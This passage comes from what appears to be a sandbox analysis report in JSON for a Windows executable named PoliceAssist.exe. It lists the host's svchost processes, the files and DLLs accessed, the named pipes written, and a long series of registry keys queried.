        "environ": {
          "UserName": "СИСТЕМА",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff630560000",
          "MainExeSize": "0x00010000",
          "Bitness": "64-bit"
        }
      },
      {
        "name": "svchost.exe",
        "pid": 3212,
        "parent_id": 600,
        "module_path": "C:\\Windows\\System32\\svchost.exe",
        "children": [],
        "threads": [
          "3508",
          "348",
          "3804",
          "4252",
          "2480",
          "4396",
          "2360",
          "3352"
        ],
        "environ": {
          "UserName": "СИСТЕМА",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff630560000",
          "MainExeSize": "0x00010000",
          "Bitness": "64-bit"
        }
      }
    ],
    "summary": {
      "files": [
        "\\Device\\Bam",
        "C:\\",
        "C:\\Temp",
        "C:\\Temp\\PoliceAssist.exe",
        "C:\\Windows\\apppatch\\sysmain.sdb",
        "C:\\Temp\\policeassist.exe",
        "C:\\SystemResources\\policeassist.exe.mun",
        "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\Explorer",
        "C:\\Windows\\WindowsShell.Manifest",
        "C:\\Windows\\System32\\kernel.appcore.dll",
        "\\Device\\CNG",
        "C:\\Windows\\Fonts\\staticcache.dat",
        "C:\\Temp\\TextShaping.dll",
        "C:\\Windows\\System32\\TextShaping.dll",
        "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
        "C:\\Windows\\System32\\uxtheme.dll.Config",
        "C:\\Windows\\System32\\uxtheme.dll",
        "C:\\Windows\\System32\\windows.storage.dll",
        "C:\\Temp\\Wldp.dll",
        "C:\\Windows\\System32\\wldp.dll",
        "C:\\Windows\\System32\\sxs.dll",
        "C:\\Windows\\System32\\wbem\\wbemdisp.tlb",
        "C:\\Windows\\System32\\C_1252.NLS",
        "C:\\Windows\\System32\\stdole2.tlb",
        "C:\\Windows\\System32\\winhttp.dll",
        "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui",
        "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui",
        "C:\\Temp\\ncrypt.dll",
        "C:\\Windows\\System32\\ncrypt.dll",
        "C:\\Windows\\System32\\ci.dll",
        "C:\\Windows\\System32\\dnsapi.dll",
        "C:\\Windows\\System32\\wuaueng.dll",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "C:\\Windows\\System32\\NgcRecovery.dll",
        "C:\\Windows\\System32\\ru-RU\\CRYPT32.dll.mui",
        "\\??\\PhysicalDrive0",
        "C:\\Windows\\SystemResources\\USER32.dll.mun",
        "C:\\Windows\\System32\\ru-RU\\USER32.dll.mui",
        "C:\\Windows\\System32\\rpcss.dll",
        "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
        "C:\\Windows\\System32\\winbrand.dll",
        "C:\\Windows\\Branding\\Basebrd\\basebrd.dll",
        "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui",
        "C:",
        "C:\\Windows\\System32\\secur32.dll",
        "C:\\Windows\\System32\\tzres.dll",
        "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui",
        "C:\\Windows\\System32\\samcli.dll",
        "C:\\Windows\\System32\\srvcli.dll",
        "C:\\Windows\\System32\\netutils.dll",
        "C:\\Windows\\System32\\logoncli.dll",
        "C:\\Windows\\System32\\schedcli.dll",
        "C:\\Windows\\System32\\wkscli.dll",
        "C:\\Windows\\System32\\dsrole.dll",
        "\\??\\PIPE\\wkssvc",
        "\\??\\PIPE\\srvsvc",
        "C:\\Windows\\System32\\wbem\\ru-RU\\cimwin32.dll.mui"
      ],
      "read_files": [],
      "write_files": [
        "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
        "\\??\\PIPE\\wkssvc",
        "\\??\\PIPE\\srvsvc"
      ],
      "delete_files": [],
      "keys": [
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration",
        "HKEY_CURRENT_USER",
        "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize",
        "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx",
        "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PropertyBag",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444B-8957-A3773F02200E}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PropertyBag",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PropertyBag",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags",
